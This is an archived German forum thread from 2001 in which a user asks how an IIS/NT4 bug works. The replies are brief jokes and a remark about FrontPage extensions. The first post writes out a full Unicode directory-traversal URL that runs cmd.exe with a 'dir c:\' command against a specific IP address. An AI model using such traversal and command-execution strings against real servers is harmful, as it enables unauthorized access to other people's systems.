PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : NT BUG



sneac
25.04.01, 20:51
Mit diesem string "141.31.158.206/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\" kann man die Festplatte von 141.31.158.206 per Browswer auslesen. Der Bug ist schon älter und funktioniert nur bei NT4 mit älteren SP's.
Kann mir jemand erklären was da genau passiert? Ich weiss nur das die cmd.exe abstürzt und den dir-Befehl am Ende des Strings ausführt. Aber warum??

Raven
25.04.01, 23:03
it's not a bug...
it's a feature...

diese frage wäre wohl in einem NT Forum besser aufgehoben.

Gruß

Raven

MCSE+I mit SP6a :-)

[ 25. April 2001: Beitrag editiert von: Raven ]

blackbird
26.04.01, 15:20
hi!

naja das verzeichnis _vti_bin weisst schonmal auf frontpage-erweiterungen des iis hin.. wer das einsetzt ist selbst schuld :D :D :D